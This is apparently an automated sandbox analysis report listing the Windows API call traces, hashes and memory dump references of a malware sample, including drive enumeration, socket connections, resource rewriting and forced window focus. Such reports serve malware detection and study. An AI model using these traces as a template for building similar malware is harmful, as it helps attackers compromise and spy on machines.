                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 789159a2bdc17082fcc724edf0c95d18c1904df461ec2cbe7ab6805167c0503a
                                                                                                                                                                                                                                                      • Instruction ID: 2600688eb67e087044bda8ff5c7e70b1b86fb3c075d049e429c8ca41136e11ef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 789159a2bdc17082fcc724edf0c95d18c1904df461ec2cbe7ab6805167c0503a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9641A1B1A00304FFDF21CF64ED44BAA77B5FB00319F10846AE81597261E738EA91CB49
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388,76AF0F00,76AE8A60,?,00000000,?,00402432,?), ref: 00401407
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,00000000,?,00402432,?), ref: 00401428
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,00402432,?), ref: 0040144E
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00402432,?), ref: 004014C1
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00402432,?), ref: 004014F5
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,00402432,?), ref: 00401502
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$File$ProcessReadSleep$AllocateCloseCreateFreeHandle
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3699383182-0
                                                                                                                                                                                                                                                      • Opcode ID: d85f17f7eb1128324d086243c0b1410018c390558ecb43cab23d11c3d94f6be8
                                                                                                                                                                                                                                                      • Instruction ID: 20ba747f7d59193939b30476b1915e6e2b0afcd877ecce6c1a7243fa2683c454
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d85f17f7eb1128324d086243c0b1410018c390558ecb43cab23d11c3d94f6be8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE310679448700AED321AF25FC859677F98E75A320F50053FF401521B1EABD1889DA6E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountSleepTick
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2804873075-0
                                                                                                                                                                                                                                                      • Opcode ID: 629daef370c9ff6295941084d448d0b407ef7d171eefaf5648885d328050dee3
                                                                                                                                                                                                                                                      • Instruction ID: 8886811e3645dd5fd105ac6f2ed7bba4e59cd6dbffd4ffc0903a61d5b9bd62ff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 629daef370c9ff6295941084d448d0b407ef7d171eefaf5648885d328050dee3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE319E60904B91DDEB32A775880436BBBE4CB52304F48087FD581A72C2C67DA888DF6F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000001,?,0045B918,00000000,0041F009,0045B91D), ref: 0041EAED
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000001,TIMESTAMP), ref: 0041EB27
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000001,CHATMESSAGES), ref: 0041EB3F
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000002), ref: 0041EB59
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcmp
                                                                                                                                                                                                                                                      • String ID: CHATMESSAGES$TIMESTAMP
                                                                                                                                                                                                                                                      • API String ID: 3065309983-3883223866
                                                                                                                                                                                                                                                      • Opcode ID: cb77cf2dcf1da886e02d156672512f75eef800315327272736a8024b0261b7c8
                                                                                                                                                                                                                                                      • Instruction ID: 8c587b7b17e814ac45b08c177e053b25692d01e71adc04499f0563c4f9581466
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb77cf2dcf1da886e02d156672512f75eef800315327272736a8024b0261b7c8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3021F876A0D316AAD711BA77AC45FDB278C8F55318F14006BFD0696282EF6CE8C1426D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041D241
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,?), ref: 0041D267
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000001), ref: 0041D283
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,-00000002), ref: 0041D296
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(0000003B,?), ref: 0041D2BA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcmplstrcpy$lstrlen
                                                                                                                                                                                                                                                      • String ID: ;
                                                                                                                                                                                                                                                      • API String ID: 2699002159-1661535913
                                                                                                                                                                                                                                                      • Opcode ID: 79530333c1fe725cb978b5d4e272efe8750bf3d1a67d0c1afd678eb2c856374d
                                                                                                                                                                                                                                                      • Instruction ID: a8241c5b27018e94fe91990cbb7f8857f40f936ec8629c4d25aebebaaca33a86
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79530333c1fe725cb978b5d4e272efe8750bf3d1a67d0c1afd678eb2c856374d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 412107B2E002159FDB218FE4CD84BE7B7ADAF11354F4800A6E825C7254D7B8EC90C768
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 0040740E
                                                                                                                                                                                                                                                      • GetLogicalDriveStringsA.KERNEL32(000003FF,?), ref: 0040742C
                                                                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 00407453
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0040746E
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00407482
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 0040749B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DriveSleep$LogicalStringsTypelstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 416886986-0
                                                                                                                                                                                                                                                      • Opcode ID: f3344195adcb0ec7c0bbaa65261c649fc690ddb1f9067fb483218459ef555618
                                                                                                                                                                                                                                                      • Instruction ID: bbfdd0562c21f24692263b6552ccf8edf75bf2367736b5f1f26355503fcbaf25
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3344195adcb0ec7c0bbaa65261c649fc690ddb1f9067fb483218459ef555618
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D1127B1C8C3C56AE73197206C15AAB3F985742304F48483AE9C4672A3D23DBD8AD75F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 004138BC: inet_addr.WS2_32(?), ref: 004138C0
                                                                                                                                                                                                                                                        • Part of subcall function 004138BC: gethostbyname.WS2_32(?), ref: 004138CF
                                                                                                                                                                                                                                                      • htons.WS2_32(00000000), ref: 004149FC
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00414A11
                                                                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000004), ref: 00414A2C
                                                                                                                                                                                                                                                      • connect.WS2_32(00000000,00000002,00000010), ref: 00414A39
                                                                                                                                                                                                                                                      • select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 00414A66
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00414A6F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: closesocketconnectgethostbynamehtonsinet_addrioctlsocketselectsocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 444889835-0
                                                                                                                                                                                                                                                      • Opcode ID: bfe5e0e2642357325bc19e7d9a52536bbd5d782dd83a106ab7bd246dd75cea33
                                                                                                                                                                                                                                                      • Instruction ID: ded24326bd6f7ac8a89645a0ee9b908de195810948d6fb162e011f81d8ed15d6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfe5e0e2642357325bc19e7d9a52536bbd5d782dd83a106ab7bd246dd75cea33
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44119171900318AFEB019FE0DC49BEEB77CFF08316F00416AFA11A6191DF749A548B98
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 00412744
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000126AE,00000000,00000000,00000000), ref: 00412758
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00412764
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041276C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041277B
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 0041278B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$CountTick$CreateThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4024735586-0
                                                                                                                                                                                                                                                      • Opcode ID: 9afe8a1db201ebacc295fb3fbbfb31c18dff43c8a1ee2666920b63a3e9e06550
                                                                                                                                                                                                                                                      • Instruction ID: 30102fe69749e0e27f47770975eac562594a5c07fedf616aa80d11cd1fe59ab1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9afe8a1db201ebacc295fb3fbbfb31c18dff43c8a1ee2666920b63a3e9e06550
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0F02B70544389BFE3117B20DEC4CBB3B4CBB423847050436F4619229097885DA6977E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,0040952A,00000000,00402188,00000000), ref: 0040920A
                                                                                                                                                                                                                                                        • Part of subcall function 00413A97: GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,?), ref: 00409223
                                                                                                                                                                                                                                                      • BeginUpdateResourceA.KERNEL32(?,00000001), ref: 00409236
                                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(00000000,0000000E,004091E1,00000000), ref: 0040924B
                                                                                                                                                                                                                                                      • EndUpdateResourceA.KERNEL32(00000000,00000000), ref: 00409254
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0040925B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Resource$AttributesFileLibraryUpdate$BeginEnumFreeLoadNames
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 980332788-0
                                                                                                                                                                                                                                                      • Opcode ID: c9332b95d5ea5032ba19c90525e84cbaac37ef8b39fb654ceb47db05e253ad1c
                                                                                                                                                                                                                                                      • Instruction ID: 7b0f776b340b65bee597074e77a709d4c982056f550d289e304040912e18300f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9332b95d5ea5032ba19c90525e84cbaac37ef8b39fb654ceb47db05e253ad1c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F05832204212BBD6322F60FC0DF5B7E65AF85B52F444679FA41B01A1CB758C229B6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00415292
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00415295
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00415298
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041529B
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041529E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00415396,?), ref: 004152A2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ForegroundWindow$Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3414397851-0
                                                                                                                                                                                                                                                      • Opcode ID: 97b4424524ad3d0712e103502ce5e10010844d45ff3c88c7f788e4f7d4387c0c
                                                                                                                                                                                                                                                      • Instruction ID: eb89fc5ad9fa10eeb6c7fdb79285fbf96a80c7b9d777ff65864cc6962a61c86c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97b4424524ad3d0712e103502ce5e10010844d45ff3c88c7f788e4f7d4387c0c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52D0C922A00138BB812237666D88CBF6F7CDFCA9B0B01005BF608521104B692453EEF7
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00405927
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00405976
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040599C
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004059EB
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405A1B
                                                                                                                                                                                                                                                      Memory Dump Source
